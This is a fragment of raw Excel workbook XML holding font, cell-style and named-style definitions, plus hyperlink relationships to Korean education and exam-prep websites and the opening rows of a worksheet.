      <color indexed="8"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="휴먼명조,한컴돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="9"/>
      <color indexed="12"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="9"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="9"/>
      <color indexed="12"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="9"/>
      <color indexed="12"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <u val="single"/>
      <sz val="16"/>
      <color indexed="18"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <u val="single"/>
      <sz val="11"/>
      <color indexed="18"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <u val="single"/>
      <sz val="11"/>
      <color indexed="18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" fillId="21" borderId="2" applyNumberFormat="0" applyFon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0" borderId="9" applyNumberFormat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/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="3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29" fillId="0" borderId="10" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="11">
      <alignment horizontal="left" vertical="center"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>
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="10" fontId="28" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="12" applyNumberFormat="0" applyFont="0" applyFill="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="328">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0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3" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection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7" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="18" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="1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6" fillId="0" borderId="13" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="182" fontId="32" fillId="0" borderId="13" xfId="81" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="182" fontId="32" fillId="0" borderId="13" xfId="81" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection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3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6" fillId="24" borderId="13" xfId="0" applyNumberFormat="1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/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="24" borderId="19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shrinkToFi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/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="24" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="45" fillId="0" borderId="16" xfId="0" applyFont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52" fillId="25" borderId="13" xfId="138" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="14" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="14" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="49" fontId="39" fillId="0" borderId="14" xfId="138" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="14" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="2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27" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="27" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="182" fontId="32" fillId="0" borderId="27" xfId="81" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="14" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="14" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="182" fontId="32" fillId="0" borderId="14" xfId="81" applyNumberFormat="1" applyFont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 wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="24" borderId="27" xfId="0" applyNumberFormat="1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6" fillId="0" borderId="15" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="29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55" fillId="0" borderId="13" xfId="139" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="13" xfId="139" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="13" xfId="139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/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="13" xfId="139" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="13" xfId="139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54" fillId="0" borderId="27" xfId="139" applyFont="1" applyFill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/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="14" xfId="139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/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="27" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="58" fillId="0" borderId="14" xfId="139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/>
    </xf>
    <xf numFmtId="41" fontId="36" fillId="0" borderId="38" xfId="55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 wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="38" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="38" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="38" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="38" xfId="81" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="38" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="38" xfId="139" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="30" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="59" fillId="25" borderId="13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6" fillId="0" borderId="15" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="42" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="43" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="44" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="45" xfId="81" applyFont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6" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="42" xfId="81" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="44" fillId="0" borderId="43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34" fillId="4" borderId="0" xfId="137" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="137">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="4" borderId="0" xfId="137" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="22" borderId="53" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="25" borderId="54" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="26" borderId="55" xfId="137" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="27" borderId="56" xfId="137" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="26" borderId="56" xfId="137" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="63" fillId="26" borderId="57" xfId="137" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="25" borderId="16" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="22" borderId="15" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="25" borderId="15" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="22" borderId="14" xfId="137" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="16" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="16" xfId="139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48" fillId="0" borderId="59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1" fillId="0" borderId="59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6" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="17" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="64" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="59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6" fillId="0" borderId="16" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="16" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="49" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection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40" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="49" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="13" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="15" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="50" fillId="0" borderId="14" xfId="138" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="60" fillId="0" borderId="68" xfId="0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61" fillId="0" borderId="68" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="27" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="13" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="54" fillId="0" borderId="14" xfId="139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54" fillId="0" borderId="59" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="54" xfId="139" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="56" fillId="0" borderId="60" xfId="139" applyFont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</cellXfs>
  <cellStyles count="152">
    <cellStyle name="Normal" xfId="0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연결된 셀" xfId="56"/>
    <cellStyle name="Followed Hyperlink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콤마 [0]_ 견적기준 FLOW " xfId="67"/>
    <cellStyle name="콤마_ 견적기준 FLOW " xfId="68"/>
    <cellStyle name="Currency" xfId="69"/>
    <cellStyle name="Currency [0]" xfId="70"/>
    <cellStyle name="표준 10" xfId="71"/>
    <cellStyle name="표준 11" xfId="72"/>
    <cellStyle name="표준 12" xfId="73"/>
    <cellStyle name="표준 13" xfId="74"/>
    <cellStyle name="표준 14" xfId="75"/>
    <cellStyle name="표준 15" xfId="76"/>
    <cellStyle name="표준 16" xfId="77"/>
    <cellStyle name="표준 17" xfId="78"/>
    <cellStyle name="표준 18" xfId="79"/>
    <cellStyle name="표준 19" xfId="80"/>
    <cellStyle name="표준 2" xfId="81"/>
    <cellStyle name="표준 2 2" xfId="82"/>
    <cellStyle name="표준 20" xfId="83"/>
    <cellStyle name="표준 21" xfId="84"/>
    <cellStyle name="표준 22" xfId="85"/>
    <cellStyle name="표준 23" xfId="86"/>
    <cellStyle name="표준 24" xfId="87"/>
    <cellStyle name="표준 25" xfId="88"/>
    <cellStyle name="표준 26" xfId="89"/>
    <cellStyle name="표준 27" xfId="90"/>
    <cellStyle name="표준 28" xfId="91"/>
    <cellStyle name="표준 29" xfId="92"/>
    <cellStyle name="표준 3" xfId="93"/>
    <cellStyle name="표준 30" xfId="94"/>
    <cellStyle name="표준 31" xfId="95"/>
    <cellStyle name="표준 32" xfId="96"/>
    <cellStyle name="표준 33" xfId="97"/>
    <cellStyle name="표준 34" xfId="98"/>
    <cellStyle name="표준 35" xfId="99"/>
    <cellStyle name="표준 36" xfId="100"/>
    <cellStyle name="표준 37" xfId="101"/>
    <cellStyle name="표준 38" xfId="102"/>
    <cellStyle name="표준 39" xfId="103"/>
    <cellStyle name="표준 4" xfId="104"/>
    <cellStyle name="표준 40" xfId="105"/>
    <cellStyle name="표준 41" xfId="106"/>
    <cellStyle name="표준 42" xfId="107"/>
    <cellStyle name="표준 43" xfId="108"/>
    <cellStyle name="표준 44" xfId="109"/>
    <cellStyle name="표준 45" xfId="110"/>
    <cellStyle name="표준 46" xfId="111"/>
    <cellStyle name="표준 47" xfId="112"/>
    <cellStyle name="표준 48" xfId="113"/>
    <cellStyle name="표준 49" xfId="114"/>
    <cellStyle name="표준 5" xfId="115"/>
    <cellStyle name="표준 50" xfId="116"/>
    <cellStyle name="표준 51" xfId="117"/>
    <cellStyle name="표준 52" xfId="118"/>
    <cellStyle name="표준 53" xfId="119"/>
    <cellStyle name="표준 54" xfId="120"/>
    <cellStyle name="표준 55" xfId="121"/>
    <cellStyle name="표준 56" xfId="122"/>
    <cellStyle name="표준 57" xfId="123"/>
    <cellStyle name="표준 58" xfId="124"/>
    <cellStyle name="표준 59" xfId="125"/>
    <cellStyle name="표준 6" xfId="126"/>
    <cellStyle name="표준 60" xfId="127"/>
    <cellStyle name="표준 61" xfId="128"/>
    <cellStyle name="표준 62" xfId="129"/>
    <cellStyle name="표준 63" xfId="130"/>
    <cellStyle name="표준 64" xfId="131"/>
    <cellStyle name="표준 65" xfId="132"/>
    <cellStyle name="표준 66" xfId="133"/>
    <cellStyle name="표준 7" xfId="134"/>
    <cellStyle name="표준 8" xfId="135"/>
    <cellStyle name="표준 9" xfId="136"/>
    <cellStyle name="표준_kc-elec system check list" xfId="137"/>
    <cellStyle name="표준_Sheet1" xfId="138"/>
    <cellStyle name="Hyperlink" xfId="139"/>
    <cellStyle name="A¨­￠￢￠O [0]_INQUIRY ￠?￥i¨u¡AAⓒ￢Aⓒª " xfId="140"/>
    <cellStyle name="A¨­￠￢￠O_INQUIRY ￠?￥i¨u¡AAⓒ￢Aⓒª " xfId="141"/>
    <cellStyle name="AeE­ [0]_AMT " xfId="142"/>
    <cellStyle name="AeE­_AMT " xfId="143"/>
    <cellStyle name="AeE¡ⓒ [0]_INQUIRY ￠?￥i¨u¡AAⓒ￢Aⓒª " xfId="144"/>
    <cellStyle name="AeE¡ⓒ_INQUIRY ￠?￥i¨u¡AAⓒ￢Aⓒª " xfId="145"/>
    <cellStyle name="AÞ¸¶ [0]_AN°y(1.25) " xfId="146"/>
    <cellStyle name="AÞ¸¶_AN°y(1.25) " xfId="147"/>
    <cellStyle name="C¡IA¨ª_¡ic¨u¡A¨￢I¨￢¡Æ AN¡Æe " xfId="148"/>
    <cellStyle name="C￥AØ_¿μ¾÷CoE² " xfId="149"/>
    <cellStyle name="Comma [0]_ SG&amp;A Bridge " xfId="150"/>
    <cellStyle name="Comma_ SG&amp;A Bridge " xfId="151"/>
    <cellStyle name="Comma0" xfId="152"/>
    <cellStyle name="Curren?_x0012_퐀_x0017_?_x0000_?_x0000_?_x0000_?_x0000_" xfId="153"/>
    <cellStyle name="Currency [0]_ SG&amp;A Bridge " xfId="154"/>
    <cellStyle name="Currency_ SG&amp;A Bridge " xfId="155"/>
    <cellStyle name="Currency0" xfId="156"/>
    <cellStyle name="Date" xfId="157"/>
    <cellStyle name="Fixed" xfId="158"/>
    <cellStyle name="Header1" xfId="159"/>
    <cellStyle name="Header2" xfId="160"/>
    <cellStyle name="Heading 1" xfId="161"/>
    <cellStyle name="Heading 2" xfId="162"/>
    <cellStyle name="Normal_ SG&amp;A Bridge " xfId="163"/>
    <cellStyle name="Percent [2]" xfId="164"/>
    <cellStyle name="subhead" xfId="165"/>
    <cellStyle name="Total" xfId="1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samplus.com/" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.goodssam.co.kr/" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pass-1.co.kr/" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.edumentor.co.kr/" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://edu.ike.co.kr/" TargetMode="External" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gosiro.co.kr/" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.g-school.co.kr/" TargetMode="External" /><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exam.co.kr/" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.champstudy.com/" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mpva2010.eduspa.com/" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.techart.or.kr/" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.teachermeca.co.kr/" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kaspa.co.kr/" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.myssam.co.kr/" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.edupdkorea.com/" TargetMode="External" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.myssam.co.kr/" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dumok.net/" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wowgosi.co.kr/" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eduview.net/" TargetMode="External" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.botemi.com/" TargetMode="External" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.edupd.com/" TargetMode="External" /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.10.edupd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0"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0" topLeftCell="A1">
      <selection activeCell="A1" sqref="A1:F1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.88671875" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="15.6640625" style="0" customWidth="1"/>
    <col min="2" max="2" width="21.5546875" style="0" customWidth="1"/>
    <col min="3" max="3" width="35.3359375" style="0" customWidth="1"/>
    <col min="5" max="5" width="37.3359375" style="0" customWidth="1"/>
    <col min="6" max="6" width="15.4453125" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="42" customHeight="1">
      <c r="A1" s="300" t="s">
        <v>504</v>
      </c>
      <c r="B1" s="301"/>
      <c r="C1" s="301"/>
      <c r="D1" s="301"/>
      <c r="E1" s="301"/>
      <c r="F1" s="301"/>
    </row>
    <row r="2" spans="1:6" ht="18" customHeight="1">
      <c r="A2" s="75" t="s">
        <v>522</v>
      </c>
      <c r="B2" s="75" t="s">
        <v>523</v>
